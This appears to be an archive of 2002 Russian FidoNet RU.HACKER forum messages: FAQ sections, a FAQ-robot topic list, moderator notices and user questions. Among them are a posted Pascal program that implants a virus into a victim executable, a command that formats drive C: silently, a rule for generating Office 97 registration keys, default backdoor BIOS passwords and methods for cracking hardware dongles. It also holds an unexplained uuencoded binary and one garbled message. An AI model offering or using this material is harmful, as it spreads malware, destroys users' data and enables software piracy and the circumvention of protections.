нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2737 [1-10330] From : Mike Zhuravlev 06-May-02 00:04:26 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2738 [1-10330] From : Mike Zhuravlev 06-May-02 00:04:27 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2739 [1-10330] From : Andrey Sergeew 07-May-02 22:39:09 2:5020/996.777 To : Dmitry S Sherskoff 2:5051/27.19 Subj : Re: Описание ядра ОС =====================================================================RU.HACKER= Hi there, Dmitry! 04 May 02 22:04, you wrote to All: DS> Ищу описание _ядер_ операционных систем: от DOS до QNX. =))) не понял "от" и "до" =) это совершенно разные вещи, тоже что и "от виндовса до юникса" = DS> Интересует Все по Всем ОС. у qnx и других юнихо-подобных, да впрочем и у доса есть исходники афаир, вот в них и копайся %) плюс всякие доки по программингу для них.. DS> Особенно _QNX_. Ссылки на книги (в том числе иностранные) и URLs DS> приветствуются. хм... когда я последний раз искал доки по qnx, что-то подобное пробегало... пробуй поисковики, они рулят Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 2740 [1-10330] K/s From : Comoderator of RU.HACKER 08-May-02 08:22:15 2:5030/1189.49 To : All Subj : Официальное! Закpучиваю гайки. :-) =====================================================================RU.HACKER= Здpавствуй All! В связи с тем что в эхе беспpецендентный наплыв, не хочу говоpить pугательства, кого... С 00:00 9 мая 2002 ЛЮБОЕ наpушение будет наказываться отключением от месяца до пожизненного. За поинтов будут наказываться узлы. В эхе публиковаться модеpатоpиалы не будут, дабы не засоpять её обильным служебным тpафиком. Подчеpкиваю: ЛЮБОЕ наpушение повлечет за собой отключение. ;-) Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2741 [1-10330] K/s From : Comoderator of RU.HACKER 08-May-02 08:31:49 2:5030/1189.49 To : Nikolay Gelms 2:5020/3343 Subj : =====================================================================RU.HACKER= Здpавствуй Nikolay! 07.05.02 Nikolay Gelms писал(а) All [!] Moderatorial! 1 год. За наpушение пpавил конфеpенции: 1. Сообщение не по теме конфеpенции. 2. Hепpофессионализм. Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2742 [1-10330] K/s From : Comoderator of RU.HACKER 08-May-02 08:41:22 2:5030/1189.49 To : Televniy Roman 2:464/99.101 Subj : ADMCrew =====================================================================RU.HACKER= Здpавствуй Televniy! 05.05.02 Televniy Roman писал(а) All [+] Moderatorial! За наpушение пpавил конфеpенции: 1. Сообщение не несущее смысловой нагpузки. П.С. All , далее по этому пункту будут только отключения. Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2743 [1-10330] K/s From : Sergey SVS 08-May-02 23:14:50 2:5030/281.32 To : FAQRobot Subj : %LIST =====================================================================RU.HACKER= --- * Origin: (2:5030/281.32) = Здесь обитают хакеры ====================================================New= Msg : 2744 [1-10330] From : Eugene Prishletzov 12-May-02 08:27:28 2:50/915.5 To : All Subj : ВйюЕйа ∙ Ё╛ й╧∙Ё... =====================================================================RU.HACKER= * ОЕ∙Ь∙Ё о Ё ю∙а Ё ╜ $CRACK$.TALKS * Сжйю∙Ей╜ Ёй ╜ RU.HACKER * Сжйю∙Ей╜ Ёй ╜ RU.HACKER.DUMMY ПЕ∙╜╛Г All! КГй Ё∙нy╧ юp жГ∙жy╛Г p ажй╜Йp юpйЬp кк юй╧ FreeBSD? ЕаГ pЛ╧ ╜йюpйай╜... йГжо∙жЁ∙Г╛а, юй▌ оy╕аГ ? np: Widowmaker - Circles [ Stand By For Pain ] /Eugene {aka Yapatha} Emails: nikkisixx$mail.ru nikkisixx$yandex.ru --- GoldED+/386 * Origin: -= Try To Find Your Own Way =- (2:50/915.5) = Здесь обитают хакеры ====================================================New= Msg : 2745 [1-10330] From : Andrey Kozlov 11-May-02 00:22:25 2:5019/29.2 To : Alexander Prohorov 2:478/60.50 Subj : Re: Hyжна пpога.... =====================================================================RU.HACKER= ··-─═╪╤═══════════════════════════┬─·· ╘╡ _Очнись и восстань Alexander_ .02 Мая 2002.17:34 Alexander Prohorov в своей мессаге к All сказал: AP> HyжHа пpога, котоpая пpиклеивает одиH файл к дpyгомy (Hапpимеp: виpyса к AP> какомy-Hибyдь екзешHикy)...... AP> если y кого есть такая заюючте плиз Hетмылом или дайте ссылкy... нам щас люлей за офтопик вломят.. {┌Пpогpамма имплантиpyет виpyс в ─┐ │файл-жеpтвy. Имена жеpтвы и виpyса │ │пеpедается как паpаметpы, напpимеp:│ │ │ │ Maker.exe virus.com tetris.exe │ │ │ │В заголовке жеpтвы должно быть │ │достаточно свободного места. │ └────────────────────────────────────┘} Program Maker; Uses Dos; Var fr,fw : file of byte; i : longint; b : byte; MN : SearchRec; Victim,Implant : String; Begin Victim := Paramstr(2); Implant:= Paramstr(1); Findfirst(Implant,0,MN); Assign(fr,Implant); Reset(fr); Assign(fw,Victim); Reset(fw); read(fr,b); Write(fw,b); read(fr,b); Write(fw,b); Seek(fw,$40); Seek(fr,$40); Writeln('Size=',MN.size); for i:=1 to MN.size-$40 do begin Read(fr,b); Write(fw,b); end; Close(fw); Close(fr); End. Hе в последний pаз я говоpю с тобой Alexander 00:22 11 Мая 2002 года --- * Origin: Lost in the time and life (2:5019/29.2) = Здесь обитают хакеры ====================================================New= Msg : 2746 [1-10330] From : Sergey Skurzhanskiy 10-May-02 13:47:26 2:5025/150.66 To : FAQserver Subj : KILLHDD =====================================================================RU.HACKER= --- UNREG * Origin: @ORIGIN.TXT.TXT (2:5025/150.66) = Здесь обитают хакеры ====================================================New= Msg : 2747 [1-10330] From : Sergey Skurzhanskiy 10-May-02 13:49:52 2:5025/150.66 To : FAQserver Subj : HOLEOS =====================================================================RU.HACKER= --- UNREG * Origin: @ORIGIN.TXT.TXT (2:5025/150.66) = Здесь обитают хакеры ====================================================New= Msg : 2748 [1-10330] From : Sergey Skurzhanskiy 10-May-02 13:50:32 2:5025/150.66 To : FAQserver Subj : HOWCRK =====================================================================RU.HACKER= --- UNREG * Origin: @ORIGIN.TXT.TXT (2:5025/150.66) = Здесь обитают хакеры ====================================================New= Msg : 2749 [1-10330] From : Dmitry S Sherskoff 09-May-02 21:02:12 2:5051/27.19 To : Andrey Sergeew 2:5020/996.777 Subj : Описание ядра ОС =====================================================================RU.HACKER= Как поживаете, Andrey ? Вторник Май 07 2002 21:39, Andrey Sergeew писал Dmitry S Sherskoff: DS>> Ищу описание _ядер_ операционных систем: от DOS до QNX. AS> =))) не понял "от" и "до" =) это совершенно разные вещи, тоже что и AS> "от виндовса до юникса" =) именно так. у каждой ОС есть свое ядро - мне нужна инфа по ним, само собой описания _програмной_ реализации, и само собой, это будут совершенно разные описания для каждой ОС. интересуют сильные и слабе стороны реализации сабжа. AS> у qnx и других юнихо-подобных, да впрочем и у доса есть исходники AS> афаир, вот в них и копайся %) плюс всякие доки по программингу для AS> них... Что-то я не встречал детальных описаний по ядру QNX , ежели я не ошибаюсь - это коммерческий продукт и открытого кода у него нет, здесь и возникает вопрос - где взять *SUBJ* ? По досу написано и запрограммлено уже столько, что ни один винт не выдержит, поэтому оно с обсуждения снимается - его (описания) и так много. > PS: Есть такой рулеззз - Neutrino. Имеет, imho, минимальное ядро > среди *ВСЕХ* ОС, при огромной стоимости продукта... :(, а про нее > чтонибудь слышно? AS> хм... когда я последний раз искал доки по qnx, что-то подобное AS> пробегало... пробуй поисковики, они рулят. они не рулят, ибо инфы много, но ~99% - левость абсолютная :( ... C уважением, Dmitry S Sherskoff. ... Лучший поpядок тот, что на поpядок выше. --- * Origin: Как SP не исправляй, он все в стек смотрит (2:5051/27.19) = Здесь обитают хакеры ====================================================New= Msg : 2750 [1-10330] From : Alexander Gerasimov 08-May-02 21:49:11 2:461/196.2 To : Arthur Ivanov 2:5038/13.29 Subj : Скачивание файла =====================================================================RU.HACKER= Hi Arthur ! 06 May 02 в 23:50, Arthur Ivanov писал к Alexander Gerasimov: AI> Используй команды sz и rz Linux-а. AI> Терминальная программа, которой ты соединяешься с Linux-ом AI> должна понимать протокол Z-модем Я имею в виду программу telnet, связь с Linux'овой машиной идет по локалке, открыт только 23й порт. Какой тут ZModem? ;-) ▌║▐║│▌║││║▐ 08 May 02 22:48 2║461▌196║2 Всего хорошего. --- GoldED 1.1.5-20422 (Win9x 4.10.1998 i586) * Origin: PKUNZIP.ZIP (2:461/196.2) = Здесь обитают хакеры ====================================================New= Msg : 2751 [1-10330] From : Sergey Abramovsky 12-May-02 19:27:20 2:5003/131.1 To : All Subj : Encript files in win2000 =====================================================================RU.HACKER= Салют, All! Я в хакерских делах ламер, поэтому нужна ваша помощь: в Win 2000, на файл поставили атрибут зашифрованный. В итоге даже с правами администратора этот атрибут нельзя снять и соответственно нет доступа к файлам. Файлы очень нужны, как добраться До свидания, All. --- А по мне пусть хоть всех поубивают, лишь бы не было войны * Origin: Сок желyдочный, неосветленный с мякотью... (2:5003/131.1) = Здесь обитают хакеры ====================================================New= Msg : 2752 [1-10330] From : Sergei Mitukov 12-May-02 12:11:59 2:5019/30.45 To : All Subj : guest =====================================================================RU.HACKER= Привет !!! Есть провайдер. Который дальше своего сайта не дает доступ по гостевому входу. И вообще полный доступ не дает по сайту. Подскажите можно ли забирать почту если входишь в сеть по гостевому входу Пока !!! --- = Здесь обитают хакеры ====================================================New= Msg : 2753 [1-10330] From : Mike Zhuravlev 13-May-02 00:00:04 2:5020/1683 To : All Subj : FAQ [Чaсть 1] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2754 [1-10330] From : Mike Zhuravlev 13-May-02 00:00:05 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск 